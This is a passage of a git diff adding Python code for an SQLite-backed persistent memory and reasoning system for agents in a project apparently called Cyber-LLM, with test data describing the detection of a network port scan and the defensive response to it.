1: + memory_groups.append(current_group) + + processed_memories.add(i) + + return memory_groups + + def _calculate_memory_similarity(self, content1: Dict, content2: Dict) -> float: + """Calculate similarity between two memory contents""" + # Simple similarity based on common keys and values + common_keys = set(content1.keys()) & set(content2.keys()) + + if not common_keys: + return 0.0 + + similarity_scores = [] + + for key in common_keys: + val1, val2 = content1[key], content2[key] + + if isinstance(val1, str) and isinstance(val2, str): + # String similarity (simplified) + similarity_scores.append(1.0 if val1 == val2 else 0.5 if val1.lower() in val2.lower() else 0.0) + elif isinstance(val1, (int, float)) and isinstance(val2, (int, float)): + # Numeric similarity + max_val = max(abs(val1), abs(val2)) + if max_val > 0: + similarity_scores.append(1.0 - abs(val1 - val2) / max_val) + else: + similarity_scores.append(1.0) + else: + # Default similarity + similarity_scores.append(1.0 if val1 == val2 else 0.0) + + return sum(similarity_scores) / len(similarity_scores) if similarity_scores else 0.0 + + def _create_semantic_from_episodic_group(self, memory_group: List[Tuple], agent_id: str) -> Optional[SemanticMemory]: + """Create semantic memory from a group of similar episodic memories""" + try: + # Extract common patterns and concepts + all_contents = [json.loads(memory[1]) for memory in memory_group] + + # Find common concept + common_elements = set(all_contents[0].keys()) + for content in all_contents[1:]: + common_elements &= set(content.keys()) + + if not common_elements: + return None + + # Create semantic concept + concept_name = f"pattern_{len(memory_group)}_occurrences_{int(time.time())}" + + properties = {} + for key in common_elements: + values = [content[key] for content in all_contents] + if len(set(map(str, values))) == 1: + properties[key] = values[0] # Consistent value + else: + properties[f"{key}_variations"] = list(set(map(str, values))) + + # Calculate confidence based on consistency and frequency + confidence = min(1.0, len(memory_group) / 10.0) + + semantic_memory = SemanticMemory( + memory_id=f"semantic_{uuid.uuid4().hex[:8]}", + memory_type=MemoryType.SEMANTIC, + content={}, + timestamp=datetime.now().isoformat(), + importance=sum(memory[3] for memory in memory_group) / len(memory_group), + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["consolidated", "pattern"], + metadata={"source_episodic_count": len(memory_group)}, + concept=concept_name, + properties=properties, + relationships=[], + confidence=confidence, + evidence=[memory[0] for memory in memory_group] + ) + + return semantic_memory + + except Exception as e: + self.logger.error(f"Error creating semantic memory from episodic group: {e}") + return None + + async def _update_semantic_relationships(self, agent_id: str) -> int: + """Update relationships between semantic memories""" + updates_count = 0 + + with sqlite3.connect(self.database_path) as conn: + # Get all semantic memories + cursor = conn.execute(""" + SELECT memory_id, content FROM memory_items + WHERE agent_id = ? AND memory_type = 'semantic' + """, (agent_id,)) + + semantic_memories = cursor.fetchall() + + # Find and update relationships + for i, memory1 in enumerate(semantic_memories): + memory1_content = json.loads(memory1[1]) + + for memory2 in semantic_memories[i+1:]: + memory2_content = json.loads(memory2[1]) + + # Check for potential relationships + relationship = self._identify_semantic_relationship(memory1_content, memory2_content) + + if relationship: + # Update both memories with the relationship + self._update_memory_relationships(conn, memory1[0], relationship) + self._update_memory_relationships(conn, memory2[0], relationship) + updates_count += 1 + + return updates_count + + def _identify_semantic_relationship(self, content1: Dict, content2: Dict) -> Optional[Dict[str, Any]]: + """Identify relationships between semantic memories""" + # Simple relationship detection based on content overlap + common_properties = set() + + if 'properties' in content1 and 'properties' in content2: + props1 = content1['properties'] + props2 = content2['properties'] + + for key in props1: + if key in props2 and props1[key] == props2[key]: + common_properties.add(key) + + if len(common_properties) >= 2: + return { + 'type': 'similarity', + 'strength': len(common_properties) / max(len(content1.get('properties', {})), len(content2.get('properties', {})), 1), + 'common_properties': list(common_properties) + } + + return None + + def _update_memory_relationships(self, conn: sqlite3.Connection, memory_id: str, relationship: Dict[str, Any]): + """Update memory with new relationship""" + cursor = conn.execute("SELECT content FROM memory_items WHERE memory_id = ?", (memory_id,)) + result = cursor.fetchone() + + if result: + content = json.loads(result[0]) + if 'relationships' not in content: + content['relationships'] = [] + + content['relationships'].append(relationship) + + conn.execute( + "UPDATE memory_items SET content = ?, last_accessed = ? WHERE memory_id = ?", + (json.dumps(content), datetime.now().isoformat(), memory_id) + ) + + async def _optimize_procedural_memories(self, agent_id: str) -> int: + """Optimize procedural memories based on success rates""" + optimizations = 0 + + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute(""" + SELECT memory_id, content FROM memory_items + WHERE agent_id = ? AND memory_type = 'procedural' + """, (agent_id,)) + + procedural_memories = cursor.fetchall() + + for memory_id, content_json in procedural_memories: + content = json.loads(content_json) + + if 'success_rate' in content and content['success_rate'] < 0.7: + # Optimize low-performing procedures + optimized_steps = self._optimize_procedure_steps(content.get('steps', [])) + + if optimized_steps != content.get('steps', []): + content['steps'] = optimized_steps + content['optimization_history'] = content.get('optimization_history', []) + content['optimization_history'].append({ + 'timestamp': datetime.now().isoformat(), + 'type': 'step_optimization', + 'previous_success_rate': content.get('success_rate', 0.0) + }) + + conn.execute( + "UPDATE memory_items SET content = ?, last_accessed = ? WHERE memory_id = ?", + (json.dumps(content), datetime.now().isoformat(), memory_id) + ) + + optimizations += 1 + + return optimizations + + def _optimize_procedure_steps(self, steps: List[Dict[str, Any]]) -> List[Dict[str, Any]]: + """Optimize procedure steps for better success rate""" + # Simple optimization: reorder steps by success probability + optimized_steps = sorted(steps, key=lambda x: x.get('success_probability', 0.5), reverse=True) + + # Add validation steps + for step in optimized_steps: + if 'validation' not in step: + step['validation'] = { + 'check_conditions': True, + 'verify_outcome': True, + 'rollback_on_failure': True + } + + return optimized_steps + + async def _cleanup_working_memory(self, agent_id: str) -> int: + """Clean up old and low-importance working memory items""" + cleanup_count = 0 + + with sqlite3.connect(self.database_path) as conn: + # Remove old working memory items + cutoff_time = (datetime.now() - timedelta( + hours=self.consolidation_rules['working_memory_cleanup']['max_age_hours'] + )).isoformat() + + cursor = conn.execute(""" + DELETE FROM memory_items + WHERE agent_id = ? AND memory_type = 'working' + AND (timestamp < ? OR importance < ?) + """, (agent_id, cutoff_time, self.consolidation_rules['working_memory_cleanup']['importance_threshold'])) + + cleanup_count = cursor.rowcount + + # Limit working memory to max items + cursor = conn.execute(""" + SELECT memory_id FROM memory_items + WHERE agent_id = ? AND memory_type = 'working' + ORDER BY importance DESC, last_accessed DESC + """, (agent_id,)) + + working_memories = cursor.fetchall() + max_items = self.consolidation_rules['working_memory_cleanup']['max_items'] + + if len(working_memories) > max_items: + memories_to_delete = working_memories[max_items:] + for memory_id_tuple in memories_to_delete: + conn.execute("DELETE FROM memory_items WHERE memory_id = ?", memory_id_tuple) + cleanup_count += 1 + + return cleanup_count + + async def _update_strategic_plans(self, agent_id: str) -> int: + """Update strategic plans based on progress and dependencies""" + updates = 0 + + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute(""" + SELECT memory_id, content FROM memory_items + WHERE agent_id = ? AND memory_type = 'strategic' + """, (agent_id,)) + + strategic_memories = cursor.fetchall() + + for memory_id, content_json in strategic_memories: + content = json.loads(content_json) + updated = False + + # Update progress based on completed steps + if 'plan_steps' in content: + completed_steps = sum(1 for step in content['plan_steps'] if step.get('completed', False)) + total_steps = len(content['plan_steps']) + + if total_steps > 0: + new_progress = completed_steps / total_steps + if new_progress != content.get('progress', 0.0): + content['progress'] = new_progress + updated = True + + # Check deadlines and adjust priorities + if 'deadline' in content and content['deadline']: + deadline = datetime.fromisoformat(content['deadline']) + days_until_deadline = (deadline - datetime.now()).days + + if days_until_deadline <= 7 and content.get('priority', 0) < 8: + content['priority'] = min(10, content.get('priority', 0) + 2) + updated = True + + # Check dependencies + if 'dependencies' in content: + resolved_dependencies = [] + for dep in content['dependencies']: + if self._is_dependency_resolved(conn, agent_id, dep): + resolved_dependencies.append(dep) + + if resolved_dependencies: + content['dependencies'] = [dep for dep in content['dependencies'] + if dep not in resolved_dependencies] + updated = True + + if updated: + conn.execute( + "UPDATE memory_items SET content = ?, last_accessed = ? WHERE memory_id = ?", + (json.dumps(content), datetime.now().isoformat(), memory_id) + ) + updates += 1 + + return updates + + def _is_dependency_resolved(self, conn: sqlite3.Connection, agent_id: str, dependency: str) -> bool: + """Check if a strategic dependency has been resolved""" + cursor = conn.execute(""" + SELECT COUNT(*) FROM memory_items + WHERE agent_id = ? AND memory_type = 'strategic' + AND content LIKE ? AND content LIKE '%"progress": 1.0%' + """, (agent_id, f'%{dependency}%')) + + return cursor.fetchone()[0] > 0 + +class PersistentMemorySystem: + """Main persistent memory system for cognitive agents""" + + def __init__(self, database_path: str = "data/cognitive/persistent_memory.db"): + self.database_path = Path(database_path) + self.database_path.parent.mkdir(parents=True, exist_ok=True) + + self.logger = logging.getLogger(__name__) + self.consolidator = MemoryConsolidator(str(self.database_path)) + + # Initialize database + self._init_database() + + # Background consolidation + self.consolidation_running = False + self.consolidation_interval = 6 * 60 * 60 # 6 hours + + def _init_database(self): + """Initialize SQLite database for persistent memory""" + with sqlite3.connect(self.database_path) as conn: + conn.execute("PRAGMA journal_mode=WAL") + conn.execute("PRAGMA synchronous=NORMAL") + conn.execute("PRAGMA cache_size=10000") + conn.execute("PRAGMA temp_store=memory") + + # Memory items table + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_items ( + memory_id TEXT PRIMARY KEY, + agent_id TEXT NOT NULL, + memory_type TEXT NOT NULL, + content TEXT NOT NULL, + timestamp TEXT NOT NULL, + importance REAL NOT NULL, + access_count INTEGER DEFAULT 0, + last_accessed TEXT NOT NULL, + tags TEXT NOT NULL, + metadata TEXT NOT NULL, + expires_at TEXT, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Reasoning chains table + conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_chains ( + chain_id TEXT PRIMARY KEY, + agent_id TEXT NOT NULL, + reasoning_type TEXT NOT NULL, + premise TEXT NOT NULL, + steps TEXT NOT NULL, + conclusion TEXT NOT NULL, + confidence REAL NOT NULL, + evidence TEXT NOT NULL, + timestamp TEXT NOT NULL, + context TEXT NOT NULL, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Memory associations table + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_associations ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + memory_id_1 TEXT NOT NULL, + memory_id_2 TEXT NOT NULL, + association_type TEXT NOT NULL, + strength REAL NOT NULL, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (memory_id_1) REFERENCES memory_items (memory_id), + FOREIGN KEY (memory_id_2) REFERENCES memory_items (memory_id) + ) + """) + + # Create indexes + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_agent_type ON memory_items (agent_id, memory_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_timestamp ON memory_items (timestamp)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_importance ON memory_items (importance)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_reasoning_agent ON reasoning_chains (agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_reasoning_type ON reasoning_chains (reasoning_type)") + + async def store_memory(self, agent_id: str, memory: MemoryItem) -> bool: + """Store a memory item""" + try: + with sqlite3.connect(self.database_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO memory_items + (memory_id, agent_id, memory_type, content, timestamp, importance, + access_count, last_accessed, tags, metadata, expires_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + memory.memory_id, + agent_id, + memory.memory_type.value, + json.dumps(asdict(memory)), + memory.timestamp, + memory.importance, + memory.access_count, + memory.last_accessed, + json.dumps(memory.tags), + json.dumps(memory.metadata), + memory.expires_at + )) + + self.logger.debug(f"Stored memory {memory.memory_id} for agent {agent_id}") + return True + + except Exception as e: + self.logger.error(f"Error storing memory {memory.memory_id} for agent {agent_id}: {e}") + return False + + async def retrieve_memories(self, agent_id: str, memory_type: Optional[MemoryType] = None, + tags: Optional[List[str]] = None, limit: int = 100) -> List[MemoryItem]: + """Retrieve memories for an agent""" + memories = [] + + try: + with sqlite3.connect(self.database_path) as conn: + query = "SELECT * FROM memory_items WHERE agent_id = ?" + params = [agent_id] + + if memory_type: + query += " AND memory_type = ?" + params.append(memory_type.value) + + if tags: + tag_conditions = " AND (" + " OR ".join(["tags LIKE ?" for _ in tags]) + ")" + query += tag_conditions + params.extend([f"%{tag}%" for tag in tags]) + + query += " ORDER BY importance DESC, last_accessed DESC LIMIT ?" + params.append(limit) + + cursor = conn.execute(query, params) + rows = cursor.fetchall() + + for row in rows: + # Update access count + conn.execute( + "UPDATE memory_items SET access_count = access_count + 1, last_accessed = ? WHERE memory_id = ?", + (datetime.now().isoformat(), row[0]) + ) + + # Reconstruct memory object + memory_data = json.loads(row[3]) + memory_type_enum = MemoryType(row[2]) + + if memory_type_enum == MemoryType.EPISODIC: + memory = EpisodicMemory(**memory_data) + elif memory_type_enum == MemoryType.SEMANTIC: + memory = SemanticMemory(**memory_data) + elif memory_type_enum == MemoryType.PROCEDURAL: + memory = ProceduralMemory(**memory_data) + elif memory_type_enum == MemoryType.WORKING: + memory = WorkingMemory(**memory_data) + elif memory_type_enum == MemoryType.STRATEGIC: + memory = StrategicMemory(**memory_data) + else: + memory = MemoryItem(**memory_data) + + memories.append(memory) + + self.logger.debug(f"Retrieved {len(memories)} memories for agent {agent_id}") + + except Exception as e: + self.logger.error(f"Error retrieving memories for agent {agent_id}: {e}") + + return memories + + async def store_reasoning_chain(self, reasoning_chain: ReasoningChain) -> bool: + """Store a reasoning chain""" + try: + with sqlite3.connect(self.database_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO reasoning_chains + (chain_id, agent_id, reasoning_type, premise, steps, conclusion, + confidence, evidence, timestamp, context) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + reasoning_chain.chain_id, + reasoning_chain.agent_id, + reasoning_chain.reasoning_type.value, + json.dumps(reasoning_chain.premise), + json.dumps(reasoning_chain.steps), + json.dumps(reasoning_chain.conclusion), + reasoning_chain.confidence, + json.dumps(reasoning_chain.evidence), + reasoning_chain.timestamp, + json.dumps(reasoning_chain.context) + )) + + self.logger.debug(f"Stored reasoning chain {reasoning_chain.chain_id}") + return True + + except Exception as e: + self.logger.error(f"Error storing reasoning chain {reasoning_chain.chain_id}: {e}") + return False + + async def retrieve_reasoning_chains(self, agent_id: str, reasoning_type: Optional[ReasoningType] = None, + limit: int = 50) -> List[ReasoningChain]: + """Retrieve reasoning chains for an agent""" + chains = [] + + try: + with sqlite3.connect(self.database_path) as conn: + query = "SELECT * FROM reasoning_chains WHERE agent_id = ?" + params = [agent_id] + + if reasoning_type: + query += " AND reasoning_type = ?" + params.append(reasoning_type.value) + + query += " ORDER BY confidence DESC, timestamp DESC LIMIT ?" + params.append(limit) + + cursor = conn.execute(query, params) + rows = cursor.fetchall() + + for row in rows: + chain = ReasoningChain( + chain_id=row[0], + agent_id=row[1], + reasoning_type=ReasoningType(row[2]), + premise=json.loads(row[3]), + steps=json.loads(row[4]), + conclusion=json.loads(row[5]), + confidence=row[6], + evidence=json.loads(row[7]), + timestamp=row[8], + context=json.loads(row[9]) + ) + chains.append(chain) + + self.logger.debug(f"Retrieved {len(chains)} reasoning chains for agent {agent_id}") + + except Exception as e: + self.logger.error(f"Error retrieving reasoning chains for agent {agent_id}: {e}") + + return chains + + async def create_memory_association(self, memory_id_1: str, memory_id_2: str, + association_type: str, strength: float) -> bool: + """Create an association between two memories""" + try: + with sqlite3.connect(self.database_path) as conn: + conn.execute(""" + INSERT INTO memory_associations (memory_id_1, memory_id_2, association_type, strength) + VALUES (?, ?, ?, ?) + """, (memory_id_1, memory_id_2, association_type, strength)) + + return True + + except Exception as e: + self.logger.error(f"Error creating memory association: {e}") + return False + + async def find_associated_memories(self, memory_id: str, min_strength: float = 0.5) -> List[Tuple[str, str, float]]: + """Find memories associated with a given memory""" + associations = [] + + try: + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute(""" + SELECT memory_id_2, association_type, strength + FROM memory_associations + WHERE memory_id_1 = ? AND strength >= ? + UNION + SELECT memory_id_1, association_type, strength + FROM memory_associations + WHERE memory_id_2 = ? AND strength >= ? + ORDER BY strength DESC + """, (memory_id, min_strength, memory_id, min_strength)) + + associations = cursor.fetchall() + + except Exception as e: + self.logger.error(f"Error finding associated memories for {memory_id}: {e}") + + return associations + + def start_background_consolidation(self): + """Start background memory consolidation process""" + if self.consolidation_running: + return + + self.consolidation_running = True + + def consolidation_loop(): + while self.consolidation_running: + try: + # Get all agents with memories + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute("SELECT DISTINCT agent_id FROM memory_items") + agent_ids = [row[0] for row in cursor.fetchall()] + + # Consolidate memories for each agent + for agent_id in agent_ids: + asyncio.run(self.consolidator.consolidate_memories(agent_id)) + + # Sleep until next consolidation cycle + time.sleep(self.consolidation_interval) + + except Exception as e: + self.logger.error(f"Error in background consolidation: {e}") + time.sleep(300) # Wait 5 minutes before retrying + + consolidation_thread = threading.Thread(target=consolidation_loop, daemon=True) + consolidation_thread.start() + + self.logger.info("Started background memory consolidation") + + def stop_background_consolidation(self): + """Stop background memory consolidation process""" + self.consolidation_running = False + self.logger.info("Stopped background memory consolidation") + + def get_memory_statistics(self, agent_id: str) -> Dict[str, Any]: + """Get memory statistics for an agent""" + stats = {} + + try: + with sqlite3.connect(self.database_path) as conn: + # Total memory counts by type + cursor = conn.execute(""" + SELECT memory_type, COUNT(*) FROM memory_items + WHERE agent_id = ? GROUP BY memory_type + """, (agent_id,)) + + memory_counts = dict(cursor.fetchall()) + stats['memory_counts'] = memory_counts + + # Total memories + stats['total_memories'] = sum(memory_counts.values()) + + # Memory importance distribution + cursor = conn.execute(""" + SELECT AVG(importance), MIN(importance), MAX(importance) + FROM memory_items WHERE agent_id = ? + """, (agent_id,)) + + importance_stats = cursor.fetchone() + stats['importance_stats'] = { + 'average': importance_stats[0] or 0.0, + 'minimum': importance_stats[1] or 0.0, + 'maximum': importance_stats[2] or 0.0 + } + + # Recent activity + cursor = conn.execute(""" + SELECT COUNT(*) FROM memory_items + WHERE agent_id = ? AND last_accessed >= ? + """, (agent_id, (datetime.now() - timedelta(days=1)).isoformat())) + + stats['recent_access_count'] = cursor.fetchone()[0] + + # Reasoning chain stats + cursor = conn.execute(""" + SELECT reasoning_type, COUNT(*) FROM reasoning_chains + WHERE agent_id = ? GROUP BY reasoning_type + """, (agent_id,)) + + reasoning_counts = dict(cursor.fetchall()) + stats['reasoning_counts'] = reasoning_counts + stats['total_reasoning_chains'] = sum(reasoning_counts.values()) + + # Association stats + cursor = conn.execute(""" + SELECT COUNT(*) FROM memory_associations ma + JOIN memory_items mi1 ON ma.memory_id_1 = mi1.memory_id + JOIN memory_items mi2 ON ma.memory_id_2 = mi2.memory_id + WHERE mi1.agent_id = ? OR mi2.agent_id = ? + """, (agent_id, agent_id)) + + stats['association_count'] = cursor.fetchone()[0] + + except Exception as e: + self.logger.error(f"Error getting memory statistics for agent {agent_id}: {e}") + stats = {'error': str(e)} + + return stats + +# Example usage and testing +if __name__ == "__main__": + print("๐Ÿง  Persistent Memory Architecture Testing:") + print("=" * 50) + + # Initialize persistent memory system + memory_system = PersistentMemorySystem() + + # Start background consolidation + memory_system.start_background_consolidation() + + async def test_memory_operations(): + agent_id = "test_agent_001" + + # Test episodic memory storage + print("\n๐Ÿ“š Testing episodic memory storage...") + episodic_memory = EpisodicMemory( + memory_id="episode_001", + memory_type=MemoryType.EPISODIC, + content={}, + timestamp=datetime.now().isoformat(), + importance=0.8, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["security_incident", "network_scan"], + metadata={"source": "ids_alert"}, + event_type="network_scan_detected", + context={"source_ip": "192.168.1.100", "target_ports": [22, 80, 443]}, + outcome={"blocked": True, "alert_generated": True}, + learned_patterns=["port_scan_pattern"], + emotional_valence=0.2 + ) + + success = await memory_system.store_memory(agent_id, episodic_memory) + print(f" Stored episodic memory: {success}") + + # Test semantic memory storage + print("\n๐Ÿง  Testing semantic memory storage...") + semantic_memory = SemanticMemory( + memory_id="semantic_001", + memory_type=MemoryType.SEMANTIC, + content={}, + timestamp=datetime.now().isoformat(), + importance=0.9, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["cybersecurity_knowledge", "network_security"], + metadata={"domain": "network_security"}, + concept="port_scanning", + properties={ + "definition": "Systematic probing of network ports to identify services", + "indicators": ["sequential_port_access", "connection_attempts", "timeout_patterns"], + "countermeasures": ["port_blocking", "rate_limiting", "intrusion_detection"] + }, + relationships=[], + confidence=0.95, + evidence=["rfc_standards", "security_literature"] + ) + + success = await memory_system.store_memory(agent_id, semantic_memory) + print(f" Stored semantic memory: {success}") + + # Test procedural memory storage + print("\nโš™๏ธ Testing procedural memory storage...") + procedural_memory = ProceduralMemory( + memory_id="procedure_001", + memory_type=MemoryType.PROCEDURAL, + content={}, + timestamp=datetime.now().isoformat(), + importance=0.7, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["incident_response", "network_security"], + metadata={"category": "defensive_procedures"}, + skill_name="network_scan_response", + steps=[ + {"step": 1, "action": "identify_source", "success_probability": 0.9}, + {"step": 2, "action": "block_source_ip", "success_probability": 0.95}, + {"step": 3, "action": "generate_alert", "success_probability": 1.0}, + {"step": 4, "action": "investigate_context", "success_probability": 0.8} + ], + conditions={"trigger": "port_scan_detected", "confidence": ">0.8"}, + success_rate=0.85, + optimization_history=[] + ) + + success = await memory_system.store_memory(agent_id, procedural_memory) + print(f" Stored procedural memory: {success}") + + # Test strategic memory storage + print("\n๐ŸŽฏ Testing strategic memory storage...") + strategic_memory = StrategicMemory( + memory_id="strategic_001", + memory_type=MemoryType.STRATEGIC, + content={}, + timestamp=datetime.now().isoformat(), + importance=1.0, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["long_term_goal", "security_posture"], + metadata={"category": "defensive_strategy"}, + goal="improve_network_security_posture", + plan_steps=[ + {"step": 1, "description": "Deploy additional IDS sensors", "completed": False, "target_date": "2025-08-15"}, + {"step": 2, "description": "Implement rate limiting", "completed": False, "target_date": "2025-08-20"}, + {"step": 3, "description": "Update response procedures", "completed": False, "target_date": "2025-08-25"} + ], + progress=0.0, + deadline=(datetime.now() + timedelta(days=30)).isoformat(), + priority=8, + dependencies=["budget_approval", "technical_resources"], + success_criteria={"scan_detection_rate": ">95%", "response_time": "<60s"} + ) + + success = await memory_system.store_memory(agent_id, strategic_memory) + print(f" Stored strategic memory: {success}") + + # Test reasoning chain storage + print("\n๐Ÿ”— Testing reasoning chain storage...") + reasoning_chain = ReasoningChain( + chain_id="reasoning_001", + reasoning_type=ReasoningType.DEDUCTIVE, + premise={ + "observation": "Multiple connection attempts to various ports from single IP", + "pattern": "Sequential port access with short intervals" + }, + steps=[ + {"step": 1, "reasoning": "Sequential port access indicates systematic scanning"}, + {"step": 2, "reasoning": "Single source IP suggests coordinated effort"}, + {"step": 3, "reasoning": "Pattern matches known port scanning signatures"} + ], + conclusion={ + "assessment": "Network port scan detected", + "confidence_level": "high", + "recommended_action": "block_and_investigate" + }, + confidence=0.92, + evidence=["network_logs", "ids_patterns", "historical_data"], + timestamp=datetime.now().isoformat(), + agent_id=agent_id, + context={"alert_id": "alert_12345", "network_segment": "dmz"} + ) + + success = await memory_system.store_reasoning_chain(reasoning_chain) + print(f" Stored reasoning chain: {success}") + + # Test memory retrieval + print("\n๐Ÿ” Testing memory retrieval...") + + # Retrieve all memories + all_memories = await memory_system.retrieve_memories(agent_id, limit=10) + print(f" Retrieved {len(all_memories)} total memories") + + # Retrieve specific memory types + episodic_memories = await memory_system.retrieve_memories(agent_id, MemoryType.EPISODIC) + print(f" Retrieved {len(episodic_memories)} episodic memories") + + semantic_memories = await memory_system.retrieve_memories(agent_id, MemoryType.SEMANTIC) + print(f" Retrieved {len(semantic_memories)} semantic memories") + + # Retrieve by tags + security_memories = await memory_system.retrieve_memories(agent_id, tags=["security_incident"]) + print(f" Retrieved {len(security_memories)} security-related memories") + + # Test reasoning chain retrieval + reasoning_chains = await memory_system.retrieve_reasoning_chains(agent_id) + print(f" Retrieved {len(reasoning_chains)} reasoning chains") + + # Test memory associations + print("\n๐Ÿ”— Testing memory associations...") + success = await memory_system.create_memory_association( + "episode_001", "semantic_001", "relates_to", 0.8 + ) + print(f" Created memory association: {success}") + + associations = await memory_system.find_associated_memories("episode_001") + print(f" Found {len(associations)} associations") + + # Test memory statistics + print("\n๐Ÿ“Š Testing memory statistics...") + stats = memory_system.get_memory_statistics(agent_id) + print(f" Memory statistics: {stats}") + + # Test memory consolidation + print("\n๐Ÿ”„ Testing memory consolidation...") + consolidation_results = await memory_system.consolidator.consolidate_memories(agent_id) + print(f" Consolidation results: {consolidation_results}") + + return True + + # Run async tests + import asyncio + asyncio.run(test_memory_operations()) + + # Stop background consolidation for testing + memory_system.stop_background_consolidation() + + print("\nโœ… Persistent Memory Architecture implemented and tested") + print(f" Database: {memory_system.database_path}") + print(f" Features: Episodic, Semantic, Procedural, Working, Strategic Memory") + print(f" Capabilities: Cross-session persistence, automated consolidation, reasoning chains") diff --git a/src/cognitive/persistent_reasoning_system.py b/src/cognitive/persistent_reasoning_system.py new file mode 100644 index 0000000000000000000000000000000000000000..f8697d0bcad5688e03d1a30dd39a7c89840d0e02 --- /dev/null +++ b/src/cognitive/persistent_reasoning_system.py @@ -0,0 +1,1505 @@ +""" +Advanced Reasoning Engine with Persistent Memory +Implements long-term thinking, strategic planning, and persistent memory systems + +Author: Cyber-LLM Development Team +Date: August 6, 2025 +Version: 2.0.0 +""" + +import asyncio +import json +import logging +import sqlite3 +import pickle +import hashlib +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple, Set, Union +from dataclasses import dataclass, field +from enum import Enum +import threading +import time +from collections import defaultdict, deque +from pathlib import Path +import numpy as np + +# Advanced reasoning imports +from abc import ABC, abstractmethod +import uuid +import networkx as nx +import yaml + +class ReasoningType(Enum): + """Types of reasoning supported by the system""" + DEDUCTIVE = "deductive" # General to specific + INDUCTIVE = "inductive" # Specific to general + ABDUCTIVE = "abductive" # Best explanation + ANALOGICAL = "analogical" # Similarity-based + CAUSAL = "causal" # Cause-effect relationships + STRATEGIC = "strategic" # Long-term planning + COUNTERFACTUAL = "counterfactual" # What-if scenarios + META_COGNITIVE = "meta_cognitive" # Reasoning about reasoning + +class MemoryType(Enum): + """Types of memory in the system""" + WORKING = "working" # Short-term active memory + EPISODIC = "episodic" # Specific experiences + SEMANTIC = "semantic" # General knowledge + PROCEDURAL = "procedural" # Skills and procedures + STRATEGIC = "strategic" # Long-term plans and goals + +@dataclass +class ReasoningStep: + """Individual step in a reasoning chain""" + step_id: str = field(default_factory=lambda: str(uuid.uuid4())) + reasoning_type: ReasoningType = ReasoningType.DEDUCTIVE + premise: str = "" + inference_rule: str = "" + conclusion: str = "" + confidence: float = 0.0 + evidence: List[str] = field(default_factory=list) + timestamp: datetime = field(default_factory=datetime.now) + dependencies: List[str] = field(default_factory=list) + +@dataclass +class ReasoningChain: + """Complete reasoning chain with multiple steps""" + chain_id: str = field(default_factory=lambda: str(uuid.uuid4())) + topic: str = "" + goal: str = "" + steps: List[ReasoningStep] = field(default_factory=list) + conclusion: str = "" + confidence: float = 0.0 + start_time: datetime = field(default_factory=datetime.now) + end_time: Optional[datetime] = None + success: bool = False + metadata: Dict[str, Any] = field(default_factory=dict) + +@dataclass +class MemoryEntry: + """Entry in the persistent memory system""" + memory_id: str = field(default_factory=lambda: str(uuid.uuid4())) + memory_type: MemoryType = MemoryType.EPISODIC + content: Dict[str, Any] = field(default_factory=dict) + timestamp: datetime = field(default_factory=datetime.now) + importance: float = 0.0 + access_count: int = 0 + last_accessed: datetime = field(default_factory=datetime.now) + decay_rate: float = 0.1 + tags: Set[str] = field(default_factory=set) + +@dataclass +class StrategicPlan: + """Long-term strategic plan with goals and milestones""" + plan_id: str = field(default_factory=lambda: str(uuid.uuid4())) + title: str = "" + description: str = "" + primary_goal: str = "" + sub_goals: List[str] = field(default_factory=list) + timeline: Dict[str, datetime] = field(default_factory=dict) + milestones: List[Dict[str, Any]] = field(default_factory=list) + success_criteria: List[str] = field(default_factory=list) + risk_factors: List[str] = field(default_factory=list) + resources_required: List[str] = field(default_factory=list) + current_status: str = "planning" + progress_percentage: float = 0.0 + created_at: datetime = field(default_factory=datetime.now) + updated_at: datetime = field(default_factory=datetime.now) + +class PersistentMemoryManager: + """Advanced persistent memory system for agents""" + + def __init__(self, db_path: str = "data/agent_memory.db"): + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self.logger = logging.getLogger("persistent_memory") + + # Memory organization + self.working_memory = deque(maxlen=100) # Active memories + self.memory_graph = nx.DiGraph() # Semantic relationships + self.memory_cache = {} # LRU cache for fast access + + # Initialize database + self._init_database() + + # Background processes + self.consolidation_thread = None + self.decay_thread = None + self._start_background_processes() + + def _init_database(self): + """Initialize the SQLite database for persistent storage""" + + self.conn = sqlite3.connect(self.db_path, check_same_thread=False) + self.conn.execute("PRAGMA foreign_keys = ON") + + # Memory entries table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_entries ( + memory_id TEXT PRIMARY KEY, + memory_type TEXT NOT NULL, + content BLOB NOT NULL, + timestamp REAL NOT NULL, + importance REAL NOT NULL, + access_count INTEGER DEFAULT 0, + last_accessed REAL NOT NULL, + decay_rate REAL NOT NULL, + tags TEXT DEFAULT '' + ) + """) + + # Reasoning chains table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_chains ( + chain_id TEXT PRIMARY KEY, + topic TEXT NOT NULL, + goal TEXT NOT NULL, + steps BLOB NOT NULL, + conclusion TEXT NOT NULL, + confidence REAL NOT NULL, + start_time REAL NOT NULL, + end_time REAL, + success BOOLEAN NOT NULL, + metadata BLOB DEFAULT '' 